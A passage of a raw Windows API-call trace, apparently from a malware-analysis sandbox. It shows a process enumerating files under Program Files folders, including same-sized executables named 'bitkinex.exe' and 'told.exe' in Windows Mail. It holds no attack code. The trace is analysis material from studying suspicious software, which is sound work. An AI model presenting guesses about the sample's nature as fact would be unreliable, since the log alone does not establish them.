lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPVWCTL.DLL.mui", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBMapTIP.dll.mui", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe.mui", cAlternateFileName="")) returned 1 [0058.294] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe.mui", cAlternateFileName="")) returned 0 [0058.294] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c0db86, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x88c0db86, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29c54b90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xe3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkSeg.dll", cAlternateFileName="")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c554863, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8c554863, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2aeed770, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x154400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNTFiltr.dll", cAlternateFileName="")) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b77e99a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b77e99a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b043430, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x156800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNWDRV.dll", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77861d5d, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x77861d5d, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwdui.dll", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778fa2d1, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x778fa2d1, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwmon.dll", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x757cd2ce, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x757cd2ce, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwppr.dll", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1a4bf5a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1a4bf5a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1abe37b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x210600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Journal.exe", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97b92e68, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x97b92e68, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x36740f70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPVWCTL.DLL", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d0a2fff, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8d0a2fff, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43278e40, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBDoc.DLL", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743456ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x743456ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43278e40, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBMapTIP.dll", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d0fadc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78d0fadc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xec410110, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe", cAlternateFileName="")) returned 1 [0058.296] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0058.297] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5570eaa, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5570eaa, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46a6d3e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x155e, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5597007, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5597007, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46ca8869, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dotted_Line.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc55bd164, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc55bd164, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x470d2eb1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x361c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_1.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc560941e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc560941e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47191587, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_2.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc562f57b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc562f57b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x476ec6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e15c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Graph.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc567b835, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc567b835, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47784c37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x26f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memo.jtp", cAlternateFileName="")) returned 1 [0058.300] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56a1992, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56a1992, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47ea8dd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x275c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Month_Calendar.jtp", cAlternateFileName="")) returned 1 [0058.301] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56c7aef, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56c7aef, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47f4134f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.jtp", cAlternateFileName="")) returned 1 [0058.301] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56edc4c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56edc4c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47f4134f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa95a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Seyes.jtp", cAlternateFileName="")) returned 1 [0058.301] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5739f06, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5739f06, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48795fdf, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1575a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shorthand.jtp", cAlternateFileName="")) returned 1 [0058.301] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5760063, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5760063, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48e21c07, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7f5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.jtp", cAlternateFileName="")) returned 1 [0058.301] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5760063, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5760063, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48e21c07, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7f5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.jtp", cAlternateFileName="")) returned 0 [0058.301] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0058.302] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0058.302] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.302] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557af760, ftCreationTime.dwHighDateTime=0x1d58b34, ftLastAccessTime.dwLowDateTime=0x20951820, ftLastAccessTime.dwHighDateTime=0x1d5dd03, ftLastWriteTime.dwLowDateTime=0x20951820, ftLastWriteTime.dwHighDateTime=0x1d5dd03, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitkinex.exe", cAlternateFileName="")) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.302] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.302] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoeres.dll.mui", cAlternateFileName="")) returned 1 [0058.302] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 0 [0058.303] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7065be1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa7065be1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa70b1ea1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1fbe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc917413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc917413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x95a52df0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2b4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOERES.dll", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa70b1ea1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa70b1ea1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa70b1ea1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oeimport.dll", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa071ff20, ftCreationTime.dwHighDateTime=0x1d597c3, ftLastAccessTime.dwLowDateTime=0xf0974e50, ftLastAccessTime.dwHighDateTime=0x1d5ae67, ftLastWriteTime.dwLowDateTime=0xf0974e50, ftLastWriteTime.dwHighDateTime=0x1d5ae67, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="told.exe", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1f425d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d1f425d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d21a3bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab.exe", cAlternateFileName="")) returned 1 [0058.303] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfa72e7a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbfa72e7a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabfind.dll", 